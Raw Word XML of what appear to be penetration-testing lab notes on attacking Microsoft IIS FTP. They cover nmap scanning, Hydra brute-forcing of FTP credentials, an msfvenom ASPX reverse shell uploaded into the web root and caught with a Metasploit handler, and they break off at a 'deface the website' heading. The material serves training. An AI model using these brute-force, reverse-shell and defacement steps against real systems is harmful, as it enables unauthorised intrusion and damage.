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78BB" w14:textId="5E40F652" w:rsidR="00853ABF" w:rsidRPr="007F3A81" w:rsidRDefault="007F3A81">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3A81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Targeting Microsoft IIS FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E973A" w14:textId="77777777" w:rsidR="007F3A81" w:rsidRDefault="007F3A81"/>
    <w:p w14:paraId="7E14D1C0" w14:textId="3FDAC5AB" w:rsidR="008F7E57" w:rsidRPr="008F7E57" w:rsidRDefault="008F7E57">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A9255" w14:textId="251E84A0" w:rsidR="008F7E57" w:rsidRDefault="008F7E57">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p21,80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="697FDEE9" w14:textId="5118FA1C" w:rsidR="008F7E57" w:rsidRDefault="008F7E57">
      <w:r>
        <w:t xml:space="preserve"># Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is part of Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (web server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0F8C72" w14:textId="536337BB" w:rsidR="008F7E57" w:rsidRDefault="00C31BB2">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>some</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server have run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with server to upload, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to do the task on server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD521A2" w14:textId="77777777" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="17433944" w14:textId="58F2321B" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve">#ftp servers allow us to upload and download </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75552F3D" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="4851075E" w14:textId="77777777" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="44A12034" w14:textId="3EA6BD33" w:rsidR="00C31BB2" w:rsidRPr="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31BB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C31BB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C31BB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> anonymous ftp login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A89356" w14:textId="77777777" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="3EC12FA0" w14:textId="71DBE217" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:r>
        <w:t>Ls -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/scripts | grep ftp-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF991C" w14:textId="2E258876" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the ftp scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E51D3B" w14:textId="77777777" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="6309DB69" w14:textId="5467C091" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p 21 - -script=ftp-anon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3809102D" w14:textId="2809A57C" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:r>
        <w:t># check that anon is allowed or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779EE59" w14:textId="77777777" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="02126CB4" w14:textId="682AFB1D" w:rsidR="00C31BB2" w:rsidRPr="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31BB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31BB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31BB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACA7FEC" w14:textId="77777777" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="60D887F1" w14:textId="259A5F12" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:r>
        <w:t xml:space="preserve">hydra -L </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/Metasploit/unix_users.txt  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">P </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/Metasploit/unix_</w:t>
      </w:r>
      <w:r>
        <w:t>passwords</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.txt </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625BA40C" w14:textId="47B38703" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FB089" w14:textId="47AF34C2" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2">
      <w:r>
        <w:t>We also have the Metasploit module to do that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018E78F" w14:textId="77777777" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="0246279C" w14:textId="7E35B8CB" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2" w:rsidP="00C31BB2">
      <w:r>
        <w:t>hydra -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l vagrant </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-P </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/wordlists/Metasploit/unix_passwords.txt  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ACA154" w14:textId="437F6148" w:rsidR="00C31BB2" w:rsidRDefault="00C67030">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">hydra -l vagrant -P </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/wordlists/Metasploit/unix_passwords.txt  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -I </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA55F4F" w14:textId="77777777" w:rsidR="00C67030" w:rsidRDefault="00C67030"/>
    <w:p w14:paraId="3F1B5F8B" w14:textId="7C0C14D8" w:rsidR="00C67030" w:rsidRDefault="00C67030">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67030">
        <w:t>-I</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67030">
        <w:t xml:space="preserve"> tells Hydra to not load old progress and start the attack from the beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E54C79" w14:textId="77777777" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="2EBFFC9F" w14:textId="11878C82" w:rsidR="00C67030" w:rsidRDefault="00C31BB2" w:rsidP="00C67030">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C67030">
        <w:t xml:space="preserve">hydra -l vagrant -P </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C67030">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C67030">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C67030">
        <w:t>/share/wordlists/Metasploit/unix_</w:t>
      </w:r>
      <w:r w:rsidR="00C67030">
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="00C67030">
        <w:t xml:space="preserve">.txt  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C67030">
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C67030">
        <w:t>_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C67030">
        <w:t xml:space="preserve"> ftp -I </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC6022F" w14:textId="164B1C88" w:rsidR="00C31BB2" w:rsidRDefault="00C31BB2"/>
    <w:p w14:paraId="1077D707" w14:textId="025A9759" w:rsidR="008F7E57" w:rsidRDefault="00C67030">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the username and password you found </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>must</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>safe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the file as sometime the password and username are used for different services are same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AFEC1D" w14:textId="77777777" w:rsidR="00C67030" w:rsidRDefault="00C67030"/>
    <w:p w14:paraId="6C4F052E" w14:textId="21A60E30" w:rsidR="009D63B7" w:rsidRDefault="009D63B7">
      <w:r>
        <w:t xml:space="preserve"># login as ftp client </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71825FD4" w14:textId="04578E1F" w:rsidR="00C67030" w:rsidRDefault="009D63B7">
      <w:r>
        <w:t xml:space="preserve">ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A79F82" w14:textId="311C75B1" w:rsidR="009D63B7" w:rsidRDefault="009D63B7">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user/password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1CEE3" w14:textId="77777777" w:rsidR="008F7E57" w:rsidRDefault="008F7E57"/>
    <w:p w14:paraId="29FAB18D" w14:textId="593E52B3" w:rsidR="009D63B7" w:rsidRDefault="009D63B7">
      <w:r>
        <w:t xml:space="preserve">Ls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BCD01C" w14:textId="3CA13221" w:rsidR="009D63B7" w:rsidRDefault="009D63B7">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> out content of ftp server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD9187" w14:textId="3F0176CB" w:rsidR="009D63B7" w:rsidRDefault="009D63B7">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ftp server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>take</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use to the directory where web application is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5D092A" w14:textId="455256A4" w:rsidR="009D63B7" w:rsidRDefault="009D63B7">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="009D63B7">
        <w:t>.asp = server-side script page used on Windows/IIS web servers.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="009D63B7">
        <w:t>Active Server Pages</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC912F" w14:textId="0C4D76F7" w:rsidR="009D63B7" w:rsidRDefault="009D63B7">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the asp file that you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>found</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E43FAB0" w14:textId="77777777" w:rsidR="009D63B7" w:rsidRDefault="009D63B7"/>
    <w:p w14:paraId="4F1CA670" w14:textId="77777777" w:rsidR="009D63B7" w:rsidRDefault="009D63B7"/>
    <w:p w14:paraId="7919FB6B" w14:textId="583C5312" w:rsidR="009D63B7" w:rsidRPr="001B362D" w:rsidRDefault="009D63B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B362D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Generate the asp reverse shell and upload it to ftp server consequently web server and then get the reverse shell, this might not work in most cases as the asp code is confined to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B362D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B362D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> very simple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49161F9E" w14:textId="77777777" w:rsidR="009D63B7" w:rsidRDefault="009D63B7"/>
    <w:p w14:paraId="4173C657" w14:textId="24359289" w:rsidR="009D63B7" w:rsidRDefault="001B362D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -f asp &gt; shell.aspx </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8A891" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="12DA6F12" w14:textId="2D4F1299" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> work better in execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279552F4" w14:textId="0A758725" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="001B362D">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B362D">
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B362D">
        <w:t xml:space="preserve"> = ASP.NET web page (newer version of .asp).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D91C7" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D" w:rsidP="001B362D"/>
    <w:p w14:paraId="2B9F2C8A" w14:textId="5E79083A" w:rsidR="001B362D" w:rsidRDefault="001B362D" w:rsidP="001B362D">
      <w:r>
        <w:t xml:space="preserve"># login as ftp client </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C6182" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D" w:rsidP="001B362D">
      <w:r>
        <w:t xml:space="preserve">ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B5749F" w14:textId="1955B302" w:rsidR="001B362D" w:rsidRDefault="001B362D" w:rsidP="001B362D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user/password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (vagrant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDBFACD" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="08D13A32" w14:textId="08430A79" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t>Put shell.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6DAAE" w14:textId="018BEF8F" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B51E87" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="5ED1CA3C" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="3D50576F" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="348BA065" w14:textId="00FD661B" w:rsidR="001B362D" w:rsidRPr="001B362D" w:rsidRDefault="001B362D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B362D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In another tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F54B783" w14:textId="229F6904" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve"># setup the multi handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6BE20B" w14:textId="6774B0E8" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF83A92" w14:textId="547CCEA2" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257221BE" w14:textId="5FBB4A21" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve">Set payload </w:t>
      </w:r>
      <w:r>
        <w:t>windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F9054D8" w14:textId="0B1BD2BB" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>same</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as the shell we create with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7423119E" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="290F50BB" w14:textId="39A9E807" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DA4FB27" w14:textId="4E0EDABA" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve">Set LPORT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B496931" w14:textId="5179A613" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5513EB" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="43893CD5" w14:textId="6858D6B5" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t>Access the shell.asp in the browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B274894" w14:textId="66586648" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="005B1445">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target_ip/shell.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D23E207" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="2A654A54" w14:textId="79D6637C" w:rsidR="005C5723" w:rsidRDefault="005C5723">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># in the real penetration testing it is not allowed to play around it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7FE7B1" w14:textId="77777777" w:rsidR="005C5723" w:rsidRDefault="005C5723"/>
    <w:p w14:paraId="7E94F774" w14:textId="0E882455" w:rsidR="001B362D" w:rsidRPr="001B362D" w:rsidRDefault="001B362D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B362D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deface the website:</w:t>
      </w:r>
    </w:p>
